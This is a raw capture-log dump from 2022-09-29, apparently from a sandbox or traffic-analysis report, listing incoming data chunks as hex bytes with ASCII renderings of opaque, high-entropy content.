                                                                                                                                                    2022-09-29 12:59:14 UTC20103INData Raw: 41 86 f3 e5 90 4d a4 29 91 53 b6 4f 6a dc 55 85 c2 0f 1c 63 1d 13 75 b2 e1 67 dd 92 a6 9e 14 05 7f b1 57 e1 3c 3f ff a6 d2 8c d0 b2 6d 67 5e 6e b5 ed de dd 4a 09 99 e6 52 79 07 5a ff 53 07 08 86 14 2c b0 37 72 05 52 0d ab 3b 0e 83 4d 20 02 35 22 37 93 29 05 ce e1 58 1d b3 ec ff c9 f9 66 03 46 90 07 b3 a3 7c a1 4f fe 3f 2e 32 b5 26 b5 18 cc 48 1a ea ec 51 63 97 74 b1 7a 93 5a 11 f6 36 6b de 87 df f4 f1 43 12 c1 6d 61 cc 6f 23 76 e6 cc 44 4c bf be 6d fd 45 ee 04 05 9b 72 fd ac b8 19 47 12 5c cd 6c 91 e9 05 d5 ea 77 40 ac e2 74 f0 b5 5b bc b2 70 a6 b1 8e 17 96 73 49 34 28 1f 2e cb 2b 12 65 ac 8c 64 c0 30 c2 4e ba 04 90 c9 cf af 35 77 db 13 56 20 91 e5 11 3a f4 56 e6 f5 6c 17 37 82 7c 87 d1 fd e4 dc 38 5d c8 84 ad a1 19 82 b3 3f 31 c0 35 fa 5b af ec 50 59 5a
                                                                                                                                                    Data Ascii: AM)SOjUcugW<?mg^nJRyZS,7rR;M 5"7)XfF|O?.2&HQctzZ6kCmao#vDLmErG\lw@t[psI4(.+ed0N5wV :Vl7|8]?15[PYZ
                                                                                                                                                    2022-09-29 12:59:14 UTC20119INData Raw: 9f 04 f6 d0 61 58 3a f3 57 24 ff 93 87 17 d3 13 37 13 e0 28 af dc f9 96 8c 87 88 78 6d 66 51 08 14 59 3d cc 53 6b 08 16 38 c5 ae c4 16 a0 b2 b0 06 37 50 8b e5 61 f1 81 05 a0 ec 5e 69 6f 32 20 ee cc 1c 33 7b 80 2e 1d bc 7e 82 ea 6d d6 41 47 2d 4b 9f 6f 52 b5 fa 09 02 d0 f1 d8 d0 d8 10 b5 cd a0 36 d9 dc 3a 0b 91 b1 fd 05 2b a0 16 72 34 f9 78 cb 4d e0 25 aa 4f 27 24 4a fd e8 a1 eb 92 54 a2 05 ae 4b 84 9d 15 91 72 ab 4b d0 bc ad 5b cd db bf 83 ee 47 b0 f1 a5 41 b0 b5 9b 63 a4 08 fb 3e 3c 5b b5 65 42 5c d3 f5 74 05 5a 30 a5 90 e6 91 4b 83 2b fd eb 1c 46 ed 56 88 b1 30 83 e4 a9 97 7c 62 db e4 2c 8f 60 99 7f 58 f6 f6 71 cc 0f ea 00 6a 8d aa c4 74 62 c3 99 c8 8e 74 6c 73 46 c2 73 92 a8 41 08 1d 00 1f 6e 24 2d 68 b2 60 36 a2 04 4b 17 d6 e0 9f be b5 a5 fc 6c 59 0e
                                                                                                                                                    Data Ascii: aX:W$7(xmfQY=Sk87Pa^io2 3{.~mAG-KoR6:+r4xM%O'$JTKrK[GAc><[eB\tZ0K+FV0|b,`XqjtbtlsFsAn$-h`6KlY
                                                                                                                                                    2022-09-29 12:59:14 UTC20135INData Raw: fd ed 6f f6 07 3c 05 4a 99 98 06 2c a2 a3 be 16 f9 6e fd c3 56 38 b4 7d ad 91 94 36 fd ff a2 58 8d 55 be 57 28 a9 db 8a 37 f4 62 3e 9b 82 0c ff 37 84 0f e3 18 7c aa 8d e6 2d a6 b1 b7 66 7d 85 10 ff 55 80 52 ad ac 36 be b6 fe 91 07 0d 5a 00 4d 7b 9b c1 63 30 16 73 f7 f1 cc 46 65 0c fc ba 6e 69 b4 11 7f 6e fe 49 77 14 c4 18 8f 11 5c 3e 5e 40 21 52 d4 7e 57 6b b7 54 7d 33 19 38 10 91 83 17 29 ed 7a fe 8c fd e0 8a 67 94 e0 0e 20 ba c0 2b e9 98 14 08 b8 da ee b3 e8 dc 17 67 7c 53 06 65 22 77 c2 95 fc f8 94 3c f9 80 05 7d 45 9b ae 92 a9 7c 6a 85 62 50 2b 64 bc f9 76 40 24 69 03 7e 98 45 ef bb dc f4 ac b5 81 51 68 1f 0e 82 ad bb 8d b8 16 49 ea 69 ac 9b 9c 65 56 83 8c 54 ee 2a d0 27 a2 dd 88 4e 7c 61 37 99 5e 58 7e 64 a5 7d 60 e7 3e d4 b2 4a 29 77 87 6b 98 c9 d3
                                                                                                                                                    Data Ascii: o<J,nV8}6XUW(7b>7|-f}UR6ZM{c0sFeninIw\>^@!R~WkT}38)zg +g|Se"w<}E|jbP+dv@$i~EQhIieVT*'N|a7^X~d}`>J)wk
                                                                                                                                                    2022-09-29 12:59:14 UTC20151INData Raw: cd 90 94 62 e6 d1 dd 99 76 23 4e 43 ee 66 c0 9a d6 e4 b9 62 4e 4c 11 a9 e4 d7 2d ee 74 d1 ad bd e3 29 3d 90 31 48 50 13 98 04 06 ff a5 84 c9 25 05 92 64 08 58 ba 66 f3 b8 05 0f b1 24 4a 93 80 10 0d 87 d9 46 22 cc e9 87 15 4a 64 3e e4 cf 37 de e1 f6 f0 03 c0 10 ba 83 e7 2e 91 ba b6 8f 49 cc 3f fb 30 d3 59 71 24 5f bb c0 76 54 2b 84 c5 41 aa 4b 8b 2f c8 5f ad ac c5 fb 9c f5 2e 75 74 47 cd d5 33 20 1e 81 a2 e5 55 a9 27 a0 45 46 53 50 7f ce 04 c5 7f 82 8c 71 77 ca cd 8c e6 3e ba 52 ea 78 66 8b db 71 4d ea fe d6 be 6b 54 e5 43 de c7 58 12 dc c5 71 3d 45 5a 5d 90 67 6b 7d 82 28 ac 01 fe ac 2b 27 d3 bb be 78 0d 84 31 57 4c 2a aa 29 2b ee 70 1a 57 70 8b 58 76 6e f3 63 b2 0f 3f 68 d2 76 4c d8 34 d1 0d 62 ef e8 b7 da 77 55 f7 18 ef 78 c5 92 c1 77 e2 c8 cc fe 91 0f
                                                                                                                                                    Data Ascii: bv#NCfbNL-t)=1HP%dXf$JF"Jd>7.I?0Yq$_vT+AK/_.utG3 U'EFSPqw>RxfqMkTCXq=EZ]gk}(+'x1WL*)+pWpXvnc?hvL4bwUxw
                                                                                                                                                    2022-09-29 12:59:14 UTC20167INData Raw: 9f e1 f6 53 0f 56 33 36 16 d0 f8 32 b7 81 6a 48 30 31 21 60 bb 1d 2d 2b 02 be 81 91 c4 58 06 0d c0 ed df cd de d6 66 12 3e f3 d7 91 08 a4 c0 c4 8a 81 aa 52 98 6f d1 1b 78 7a cd c3 85 1f 43 a2 f9 ec d4 ad 2a 89 56 a2 65 21 49 03 5b 31 f5 00 2d 85 69 9b db 5a ab d3 c7 27 e2 26 b4 e8 5e 84 92 63 f2 26 1f 93 69 e4 d8 23 c9 55 6f a0 de a6 b3 04 ad 42 d2 1e 98 64 06 dc 91 b1 1a a4 a8 4d 3e f0 08 01 b5 da c6 10 f6 b4 29 1f 0f 3e 92 68 2c 26 4b e8 ef a9 af 4d 6f 98 bc 57 50 44 a4 98 90 61 c7 f7 c5 16 8b d7 4c 7b 1c 3d 6a d3 48 d5 f4 6c a4 c6 90 00 77 d5 ca d8 a8 5f 87 9e f4 69 59 4e 39 34 71 31 6a b9 15 f4 31 75 bf 6f c8 fe ce 11 08 20 7b 5d 98 72 58 42 4f 93 00 9a dd 8a 9f eb f9 73 a3 54 a0 ee ab f5 8d 68 ef 2e 51 c7 35 7d f0 57 96 e9 ce 3f a6 db de 54 ca 9e 45
                                                                                                                                                    Data Ascii: SV362jH01!`-+Xf>RoxzC*Ve!I[1-iZ'&^c&i#UoBdM>)>h,&KMoWPDaL{=jHlw_iYN94q1j1uo {]rXBOsTh.Q5}W?TE
                                                                                                                                                    2022-09-29 12:59:14 UTC20183INData Raw: 7e 5a 74 e8 b2 ec e2 ba 7c ca 53 db 17 56 2d 63 0b ec d7 b0 b8 b8 96 be 13 8d 35 2b 12 9e f0 99 12 0b 6d 0b f9 0a 51 ed 03 06 34 c1 1a e0 e7 58 90 60 c1 a5 f8 c5 94 3b 3b 3b 0b 24 2e 71 69 ba ed 4b df c1 3a e0 6f 78 6a 19 2c fe 58 d1 19 dd 7b 62 3d c9 58 f0 a1 ed e1 8a 00 7f c0 d8 48 99 9b 1e bf f5 54 4e 61 93 bc 52 e3 b6 50 62 86 4a 3e d4 4b 9a dc 4c cb 22 d7 a2 df f8 29 ff ac 6c f5 7c 27 4d 3b 72 53 28 f0 09 b4 cf 20 a6 92 26 af 57 ef 70 82 10 bc e1 e2 9d 19 7e 6f 01 22 fe 0d 20 22 ac 67 3c 8a 97 7d 1a 90 0d 8d 02 fe d1 2f 23 b5 32 0d eb ea fc bd 1c 8d e7 13 1f 92 f0 8b 4f 97 e6 35 06 ea 24 a7 0e 38 c9 5f 67 6d dd 7d 1a 4a 74 b4 d2 f9 87 2e 08 e8 c1 9e f8 e2 f0 be 90 6e f9 9d 7d 65 f7 0e a6 f3 5d a2 2f d9 61 7c df 05 cf 84 71 98 ee 46 04 41 39 9d d9 53
                                                                                                                                                    Data Ascii: ~Zt|SV-c5+mQ4X`;;;$.qiK:oxj,X{b=XHTNaRPbJ>KL")l|'M;rS( &Wp~o" "g<}/#2O5$8_gm}Jt.n}e]/a|qFA9S
                                                                                                                                                    2022-09-29 12:59:14 UTC20199INData Raw: 6b f5 a1 dd 36 10 46 cd ee 06 04 37 d6 92 a6 e7 e9 3d d8 d2 70 bf e5 6b 7d 15 5c f1 74 17 cb a0 aa 14 ff b0 1c 25 7e 77 24 c1 2b 61 20 0e 70 4d 63 ea bd bf 6f ab 18 32 e4 f1 9e 99 e1 c7 64 99 ef 5c f6 46 d3 8a 11 e7 4d a3 12 c4 cf dd 32 d6 e4 e9 16 92 68 36 f9 56 34 36 f4 0a 66 de 8f 13 cd 0e 29 d7 e6 81 58 53 35 7f 18 23 d4 9c 5f a6 75 5e 3d d3 4e b5 78 26 d5 6f de fc 31 2a cc 5b a4 4a fd c5 a3 00 36 05 e4 dd 66 55 a1 42 20 e3 3b c6 4c 7a 63 92 99 21 08 db d5 cb 35 15 0d d0 51 14 f6 26 fa 71 85 f9 69 53 4a 31 35 ff 22 15 f9 83 65 35 47 be 18 25 fa 9b bb 07 a1 9b a1 f7 32 f3 7d 18 24 6b d8 41 5f 60 9e e2 c6 d6 61 9c 07 7a 80 69 28 7c d5 55 bf fe 32 55 f8 86 af 32 3e ea 2e a6 22 2b 8e 24 54 5b b5 20 85 4c 8c 96 a0 9f e7 94 f2 0d 7e eb f5 0a 77 e4 75 4a cb
                                                                                                                                                    Data Ascii: k6F7=pk}\t%~w$+a pMco2d\FM2h6V46f)XS5#_u^=Nx&o1*[J6fUB ;Lzc!5Q&qiSJ15"e5G%2}$kA_`azi(|U2U2>."+$T[ L~wuJ
                                                                                                                                                    2022-09-29 12:59:14 UTC20215INData Raw: c1 d1 a8 40 24 97 ae 5e 0f 5f 68 34 6f 36 69 2c ca 14 66 bc 66 6d 11 c8 b5 5c 69 b1 61 14 0b 59 ce 2a 75 5f 3b 98 c5 7c 5d 37 f9 bf 95 03 10 45 3c 54 06 fe 36 5f 84 c8 ad 43 aa fd 80 14 cc d6 db 8b 97 c6 20 5f 5d fd 67 34 e6 2e 7f ff f3 51 8f 51 37 06 6e 19 38 30 10 66 78 f3 3a 85 d9 1c 39 bc ce 80 c8 ed a4 1e e3 b1 19 d0 05 a0 50 3c 39 bc 84 d2 f2 b5 fd ea 07 d0 55 a9 54 96 fd e2 e2 0a 57 b7 35 c1 16 54 a2 5d 21 bd cc 60 8e 15 4d 6f 26 b5 3c 2e 50 a9 31 c7 58 c7 67 36 7a 19 fa 67 4c 8f 02 b2 a9 d5 ab 5c 67 8a 6b 4c ab ff 10 6b 60 6b 9c 83 d1 23 c7 d4 90 d1 8e ea dc 21 20 14 1f 96 6f ee a1 6f 3f 40 81 5e 96 b3 9e 58 ce c2 96 ce 4a 60 82 79 12 90 d5 27 ed 8e 08 c8 bc df 52 15 72 a0 d4 ad ff 11 f1 36 d6 1a 84 1c 93 c7 8f be 8e 46 06 01 98 8f b8 7e a6 6a e4
                                                                                                                                                    Data Ascii: @$^_h4o6i,ffm\iaY*u_;|]7E<T6_C _]g4.QQ7n80fx:9P<9UTW5T]!`Mo&<.P1Xg6zgL\gkLk`k#! oo?@^XJ`y'Rr6F~j
                                                                                                                                                    2022-09-29 12:59:14 UTC20231INData Raw: a2 92 18 a3 0e 4f 2e 0f 93 fd 7c 6a 30 68 9c 85 3d 72 65 db 3b a3 a0 f6 a0 59 18 51 ff dd 12 9a 66 98 10 84 fd 9b 68 d9 b5 a4 4f 5b de 2d 25 0e 4e a2 c7 e3 19 80 7b 80 f9 64 fa 41 db 51 59 e5 3c be f2 8b ce 5d fa 71 01 ca 85 79 84 1e 39 dc e0 32 bd e2 a2 53 02 9f 70 bd d1 73 e4 ce 7d 50 98 b0 ee 30 f6 3e 9c 79 33 4e e1 df 47 60 89 06 f0 5e 16 b0 32 18 d8 7c 9a 67 bc 5c 54 a8 34 44 73 56 6a 4f fc 32 d9 de 76 cf 30 98 e3 88 f4 7a 93 6b 90 cf a3 a8 74 66 4c 66 a6 61 af ba 73 a5 da 4d 04 7d 93 4a 6e 16 ce a1 64 3a 6f 79 c8 a9 b5 13 04 e5 3c af 1a b8 e3 ae 63 a3 c2 d5 8e f6 53 19 88 c1 51 6d e4 f2 b6 e3 6e 8f 66 8b 30 40 05 25 09 2b 17 aa 3e 51 85 44 e4 a9 36 d3 4e 17 22 de 69 02 06 e6 62 bd 22 23 49 d7 c6 98 e1 9a 86 90 2f 9d 4f 88 0c 20 69 2c bc c5 10 67 fd
                                                                                                                                                    Data Ascii: O.|j0h=re;YQfhO[-%N{dAQY<]qy92Sps}P0>y3NG`^2|g\T4DsVjO2v0zktfLfasM}Jnd:oy<cSQmnf0@%+>QD6N"ib"#I/O i,g
                                                                                                                                                    2022-09-29 12:59:14 UTC20247INData Raw: c7 c6 27 84 9a 03 36 ba 74 0a ee 51 df c2 e0 a2 f6 47 31 68 14 44 6d d8 c1 0d 4b c9 90 79 e5 04 53 0f 66 6c 23 13 e2 82 97 de 67 b3 be 99 99 81 b6 ad 17 56 98 70 a2 1b e9 fd 95 2f c5 cc 5f bc 65 40 65 dd b3 9b b9 02 94 1e 37 3f b4 a9 a8 7a f4 87 01 9c f7 d4 a1 84 66 6d 85 7e ad 91 b4 d4 8a cc 42 64 7f 2e 2b ba 1c d6 28 3a 85 e9 85 4f d2 2c 82 5b 00 19 5d 10 be 3c 25 8d b0 e4 df cc 1e a1 a1 ad c6 b8 9f 1e ce 50 07 8d 12 4d 5c b0 2f ae 20 28 d1 4c 0b 21 8a bb 7a 2a 5a 25 32 7a 46 79 04 87 67 ae 76 26 71 1b fc be 80 80 d9 fd f3 23 8b e8 3a a4 a8 9c 3d 17 07 62 b2 c1 df 51 5c 6f bc ec 42 00 be ff 68 25 5f bf e1 07 a9 f6 e1 05 68 b4 e2 e4 71 19 16 1d d0 ff 27 0f d3 9f ff 7f 4d 15 dd da 3c 2c 34 8c d8 43 e8 b8 3c c0 14 4b e7 f5 64 e3 65 a2 81 51 2c 29 06 e4 9a
                                                                                                                                                    Data Ascii: '6tQG1hDmKySfl#gVp/_e@e7?zfm~Bd.+(:O,[]<%PM\/ (L!z*Z%2zFygv&q#:=bQ\oBh%_hq'M<,4C<KdeQ,)
                                                                                                                                                    2022-09-29 12:59:14 UTC20263INData Raw: 68 5c ef c3 12 00 6a 36 95 61 93 67 40 88 3c 2e 5f 67 7d 69 33 ed 46 7c e6 b3 21 fd 5a 2f 07 8b 55 41 e0 ff 20 cd 9d fa ec 89 24 94 3c 00 32 f0 47 26 fd b2 25 ef 8e ca ac 26 fa f9 48 eb 48 1f a6 2d ab 3e ae e5 9e fc cd 35 81 ac d3 55 7a c7 36 9c 15 12 eb fb 04 8b f1 af af 70 79 45 d0 45 ce 0e 28 91 a5 8e 49 a8 bb 95 69 3f 92 09 2c 02 de 14 8b a9 5b d8 77 0a 23 65 bf ee f8 27 0b 8e ff cc 51 2f 81 4b f0 a1 ca 4a 19 0e 7d 5a d6 34 33 a6 a4 22 23 06 9e 5d 30 94 76 04 df ac a7 6a bf ae aa 83 c8 34 11 6e 51 60 34 d5 a1 62 73 0a de e7 09 ef e2 6e 37 ea c8 eb f8 f2 3a b1 6c bd 69 22 b0 fe 57 f6 84 3d 2b 82 17 bd f0 46 d1 f2 db 6e 98 a2 16 0b 8a 1f dc 6c e6 25 08 0c fb 7d 4d 50 38 20 d5 f0 15 5a bc 52 f8 cc 37 f3 aa bb 89 8f f1 1a 0d a3 39 3c be 88 ac 29 c2 79 46
                                                                                                                                                    Data Ascii: h\j6ag@<._g}i3F|!Z/UA $<2G&%&HH->5Uz6pyEE(Ii?,[w#e'Q/KJ}Z43"#]0vj4nQ`4bsn7:li"W=+Fnl%}MP8 ZR79<)yF
                                                                                                                                                    2022-09-29 12:59:14 UTC20279INData Raw: fc d2 c7 ad 35 02 22 9b 4f 13 47 52 26 e5 79 f2 a1 7e 83 47 63 6a f5 c1 71 6a e4 c0 cc b5 1c 1b b4 08 48 12 e7 75 6c 9a a0 7e 48 bb c8 2d 7c d1 8d 12 49 b7 30 d6 42 06 80 2a 86 a2 e7 49 53 2e e5 e7 9e eb 35 71 30 07 90 dc 6f 0d 83 ae ae c0 c2 cc 4c 57 f8 d3 1e 10 4a b9 7b 57 38 38 36 64 77 3c b1 f8 c4 f6 f1 4e 4d 50 06 28 0b a2 68 c9 5a 26 9d 94 a6 7c a9 3c bb 1d fe cb 52 e8 8a 0f 26 77 c9 0c f0 66 55 f0 44 bc d8 ae 36 ee 45 26 35 5e 36 63 32 fc 36 6b 75 ef a2 0e 4a 46 99 4d 4b cd 81 03 bc c4 86 15 b1 2e 1d 83 9b d3 3e f2 ba f8 58 02 5e 54 03 d9 a2 9f 31 0c 2c 7c 97 32 9b f8 f9 fe db 41 1f 3a 7a 8f 7b 71 e1 7c 24 3c ff 45 51 d0 04 66 57 b3 fe 7c 20 39 97 a4 f7 a2 ca 7e 75 6a d7 56 93 b5 c9 72 27 b0 0e 60 0f bc a2 6b f6 77 14 16 d4 96 19 eb 63 8e 02 40 90
                                                                                                                                                    Data Ascii: 5"OGR&y~GcjqjHul~H-|I0B*IS.5q0oLWJ{W886dw<NMP(hZ&|<R&wfUD6E&5^6c26kuJFMK.>X^T1,|2A:z{q|$<EQfW| 9~ujVr'`kwc@
                                                                                                                                                    2022-09-29 12:59:14 UTC20295INData Raw: 33 ab 96 fb 40 ad c7 90 48 f0 e0 19 ff 4f 51 ba 46 0c 70 ab 00 1a a1 c1 f8 1f c1 10 e8 f0 7e 13 9c 17 29 c2 31 df 61 fe 22 08 9f c3 49 15 cc 19 ae 26 03 59 c2 e9 0e b5 12 63 10 e0 02 ca a2 9d d0 ea ff 97 3f 56 8a 59 0e 50 4a 6a 53 93 e4 79 69 5c cc c0 5a 54 f7 9b 4b a1 f0 e0 f6 13 f0 a2 60 ed 3f ee f0 a2 f4 1b dd 85 8e 07 0c b4 df 04 2c 43 10 e7 71 75 3f 98 cd 90 5f 7f 3b f8 05 5c a5 b8 a3 4c a7 12 8e 86 2f 16 ef be bb 9f 07 22 be 87 5c ba aa ce 83 f2 5a 1f 64 65 b4 83 40 f0 2b 25 e8 3b 9d db b0 ef c9 63 84 62 d6 c4 d5 d0 a4 4a 28 aa 31 a2 e1 e7 31 cc 6a 65 e8 a9 19 6f ab 64 bd 67 dc ec c1 67 24 d6 80 c6 25 5a 9e 03 44 a8 bc 84 61 1c 34 b2 7d 12 ba 99 36 51 b3 f2 56 f1 fe 5a c9 83 68 c1 1f 77 0c b8 4c d9 b0 44 15 4a 71 ba e2 28 c1 ee 2c 9b d0 d9 5f 2f e0
                                                                                                                                                    Data Ascii: 3@HOQFp~)1a"I&Yc?VYPJjSyi\ZTK`?,Cqu?_;\L/"\Zde@+%;cbJ(11jeodgg$%ZDa4}6QVZhwLDJq(,_/
                                                                                                                                                    2022-09-29 12:59:14 UTC20311INData Raw: 45 fa 49 58 f7 75 9e ad c7 3a 55 fa 5b 9e d5 61 33 40 de ac 63 00 af 8d 8a d5 1c 73 76 9f 27 7d 8d 22 d6 4a c3 34 e5 d8 55 a7 6c 42 15 2c 90 5f 70 06 63 51 0b 37 58 19 2d 0a 37 eb 43 45 91 e8 73 81 71 a6 3d 7e 2d 4c d2 aa e6 81 c2 e7 e2 51 6a cc 48 87 7a 8d 4b e6 b4 21 6b 07 15 81 5a 84 2b a0 a9 ca ca 3b 62 89 92 e9 4d 89 32 a2 7a 4b 3b af b9 6a fb 7e de 6f d5 f2 8e a1 4b 03 33 9d 81 a7 b3 4a 5e 35 e9 64 2c 69 90 fc 1c 3b fd d3 3a dc 46 81 e5 29 2f 43 e9 51 6a 94 a5 1c 97 b1 de c0 55 f6 ae b2 6f b2 c9 e4 a1 25 df ea a0 83 72 9f 57 41 3c 4d 44 24 86 83 ef 0d 6f d8 fd 8f 78 5e f5 c8 ba c1 03 11 36 50 30 48 c5 29 a3 be 41 78 11 ce c4 48 48 89 ae 93 a7 75 52 f3 6f d6 65 f3 57 b2 05 d7 55 03 2f 67 cb bf bd c0 9c c9 a4 b3 f1 9a 0a a2 c3 f1 0d bc 15 67 c0 95 e6
                                                                                                                                                    Data Ascii: EIXu:U[a3@csv'}"J4UlB,_pcQ7X-7CEsq=~-LQjHzK!kZ+;bM2zK;j~oK3J^5d,i;:F)/CQjUo%rWA<MD$ox^6P0H)AxHHuRoeWU/gg
                                                                                                                                                    2022-09-29 12:59:14 UTC20327INData Raw: 92 32 b1 e3 6f 69 c3 6e 5d ee 05 c7 ce db 27 30 db 42 92 5a 9c ba 3c df 30 e5 85 82 ed 11 30 10 ce f4 27 51 d1 96 d9 07 ed b7 25 fd b7 0b d6 07 1e 77 5c ef f8 b7 14 09 6a ec 6b 75 a3 31 a2 27 3f b7 9e 08 e2 a8 6f 91 c5 16 b9 bf a7 ef bd c2 0c 86 90 6d 26 5a 4d d9 05 c2 22 61 30 14 b7 c1 cb 43 3c 3c 12 40 a5 46 de 08 fd 2e b7 a9 64 04 21 2b c0 7c 32 5f 13 6c 6f ff 9a 2e a2 d6 e1 d0 50 64 c5 bb 92 44 f6 b5 82 49 cd 97 cf 9f eb 9f bb 18 d5 fd 95 70 47 76 f8 dc a1 9b 79 7b 72 59 16 74 d2 e8 33 6f 32 87 33 1a 63 b5 a6 d5 14 ce c7 6d 0c 11 09 5b a2 9e 9b 5c 2c 39 45 49 0c 03 5f 48 8f db bf 2a 42 1f 8c f3 bb 26 09 ef ef 20 08 b3 2c 49 4d 16 1f eb 66 30 e1 85 a9 ab 37 0e 88 15 1e 0e ba 38 a5 87 90 45 fe a2 95 29 33 5a 6a c8 1a a7 ab 9e 44 57 f6 5d d8 23 0b 1a 95
                                                                                                                                                    Data Ascii: 2oin]'0BZ<00'Q%w\jku1'?om&ZM"a0C<<@F.d!+|2_lo.PdDIpGvy{rYt3o23cm[\,9EI_H*B& ,IMf078E)3ZjDW]#
                                                                                                                                                    2022-09-29 12:59:14 UTC20343INData Raw: 61 10 36 11 0f ba ec f3 90 2c a9 67 ea 60 12 f6 ad dd ed 67 42 19 70 87 d8 57 8f 10 72 60 3d 57 2e b5 8d 66 c5 15 d6 77 b2 34 34 d9 82 c9 80 5f 40 46 a9 fe 74 97 47 29 c2 2b c2 42 e5 95 2c ec 01 64 a7 e2 d4 f3 86 eb 73 85 e7 ed 8c 53 4e 95 36 15 f7 8c 9f db bb 55 b2 0e 60 95 b9 4c 3f 1e 6e 86 b6 97 ba 7c 35 8f 60 1f 3d 71 19 7f 58 f2 b8 65 be c5 14 9e 95 02 70 10 e8 4b c3 00 f2 6e 3b 9c c3 53 18 2c 71 ee e4 76 0d 97 3d 1f 91 75 2c 37 8f 18 12 d8 8d 01 2d 62 6e 95 c3 6e dc 67 a1 12 a8 31 d5 07 20 7a 47 10 22 b5 97 67 e2 7c 92 c5 fe 5f 33 a3 0c 8b a0 04 69 05 f0 e2 3d 65 ac b2 bf 21 1a 42 06 e9 e1 9a b4 7b e5 fb 29 f5 b9 f8 e5 41 8b dd c2 17 12 c3 d2 f6 69 fb 60 13 60 69 ad 72 de 6a 4c da 8e ff ba 2c 83 0f 79 f4 87 f6 c5 85 fc 72 b9 b7 68 6e f8 4c 48 30 64
                                                                                                                                                    Data Ascii: a6,g`gBpWr`=W.fw44_@FtG)+B,dsSN6U`L?n|5`=qXepKn;S,qv=u,7-bnng1 zG"g|_3i=e!B{)Ai``irjL,yrhnLH0d
                                                                                                                                                    2022-09-29 12:59:14 UTC20359INData Raw: 16 c7 f2 a9 90 d5 e8 e2 85 fb 7a 7e 77 22 3d 1c ae bf f1 cc 71 b6 f0 28 8e ff 2b b0 25 69 fa b5 e5 68 94 f2 64 40 29 5c 1f 1d 56 2f 7f 7c 12 fc f8 18 ec 9b c2 15 a9 1d 25 6c 04 af b9 b4 42 f8 0d 88 d0 87 07 dd 8d 30 f0 95 4e 83 9b 8b e3 27 25 a0 ee 55 d4 b7 d3 c0 73 a1 1d 4f f8 d0 66 76 ff ac f4 84 a0 cc 9d 32 77 f9 00 c2 b9 33 c2 33 28 d5 f2 d0 e7 1a 08 7a 51 58 5e 31 87 12 5b ce 9c d7 cd 2f c1 e1 bb f2 0c dd a4 7e 5e 8b 39 70 bd 9a 3b 3f 00 d7 dd 8c ec 4f ad 2e 7c 34 fd a4 e5 6d 6e c9 de 13 ab 31 79 4e e0 25 51 f1 78 c4 2f 61 0e c4 a1 ed a5 fe 43 b0 48 d0 1b f4 ad 87 f6 18 02 41 fb 99 6c 20 48 d4 c1 f7 fc 7a 0e a3 2a 49 83 1e 5a 20 49 b3 9e 9d 21 23 20 3f 83 ee 82 51 49 55 18 fd f7 fe 07 59 77 e9 c1 59 89 15 7f 1a ff c4 67 9b b0 78 8c a3 22 f0 07 c0 7a
                                                                                                                                                    Data Ascii: z~w"=q(+%ihd@)\V/|%lB0N'%UsOfv2w33(zQX^1[/~^9p;?O.|4mn1yN%Qx/aCHAl Hz*IZ I!# ?QIUYwYgx"z
                                                                                                                                                    2022-09-29 12:59:14 UTC20375INData Raw: ce 36 61 04 d6 31 80 45 e0 37 5c 8c db 15 89 13 6d db 87 24 a8 2c be b3 39 ee c7 aa 6b a2 6c 9d 78 fa aa db 9d 9a 19 d8 a5 5a 0c eb c8 9c 5a ec 4e 21 9a 85 69 89 4f 06 1c 58 af 52 ae 69 3f 36 02 8f f0 dd 3e 02 c2 d8 d5 9c 63 ae 85 45 9f 0c 43 87 a8 94 65 1f 8c 39 fb 8b 76 f8 a4 8e e1 c3 e2 57 f8 97 ee e0 74 dc 3b f6 c2 db 8c 9d 24 1f 12 73 19 3a 33 56 e1 15 63 fc 0d 2b 02 d9 9d 39 81 5c 98 9b 48 a5 12 10 da 54 0e 6d ee 21 29 77 26 0e 61 3b 9a 63 73 c1 b6 72 fe 56 80 50 34 17 d7 47 09 10 c4 6c a8 ac 5a 53 08 ca af 4c 6d d6 ee 53 53 66 58 8d 1c b1 96 a7 b4 91 ab f8 a7 58 9a c9 b5 0a 89 3f c0 9e d1 89 09 66 9f cf f5 da 7d b1 c7 89 7b 8a 93 40 ec a9 41 75 e7 57 95 39 e7 0f 8f a0 6c 72 0e 3d 2e 15 52 8b bc ec ff d5 3d 0d cb e3 4f 85 da 71 b2 1d 6d 28 d8 ae 84
                                                                                                                                                    Data Ascii: 6a1E7\m$,9klxZZN!iOXRi?6>cECe9vWt;$s:3Vc+9\HTm!)w&a;csrVP4GlZSLmSSfXX?f}{@AuW9lr=.R=Oqm(
                                                                                                                                                    2022-09-29 12:59:14 UTC20391INData Raw: 6c 77 69 bb dd 14 ef 4d 94 d6 23 c5 76 8d f5 c2 69 4d c2 c7 ff 07 41 1a a2 c4 f4 fd 78 1c d8 96 6d 96 65 1d 53 db 34 51 ab d9 10 38 46 7f 69 4a 2e 81 af 80 ed eb a0 c5 52 65 4f f4 1e e5 12 67 81 d5 f9 52 3c 8f ac 8f 3a 05 ce 7c 23 4b 7a 0b 67 4c e8 6e a2 00 33 2f c6 d3 bd 29 77 15 c9 e5 ea e8 2b 34 0a ec 9e d1 ab f2 ab da 14 63 86 95 9b 53 92 f4 3b c4 34 30 31 6f 87 66 4a 85 50 d3 7c a7 8f cd 1f bf 0c 7e 3a 26 19 b6 da 3c bb ee f8 0c a3 00 73 8b 3c 85 72 c1 32 d8 94 1f bf 3b de 18 a7 a3 7c 76 6d 36 da 36 dc 12 f1 49 c3 d6 d2 61 77 68 25 e4 01 06 4a 39 3d b7 57 70 5e 0b 03 81 9d 1d 25 86 6f a0 27 dd e5 8a 36 c2 be 81 8c 6d 19 96 65 bc 4a 33 73 1f d0 c9 8c 91 2c f9 3f ec e9 35 2b 2a 7a 6e 8c 6a 0b b6 a0 c5 ab 2e 9b 42 21 ca 78 cc cc 91 05 04 cf 20 3a d1 44
                                                                                                                                                    Data Ascii: lwiM#viMAxmeS4Q8FiJ.ReOgR<:|#KzgLn3/)w+4cS;401ofJP|~:&<s<r2;|vm66Iawh%J9=Wp^%o'6meJ3s,?5+*znj.B!x :D
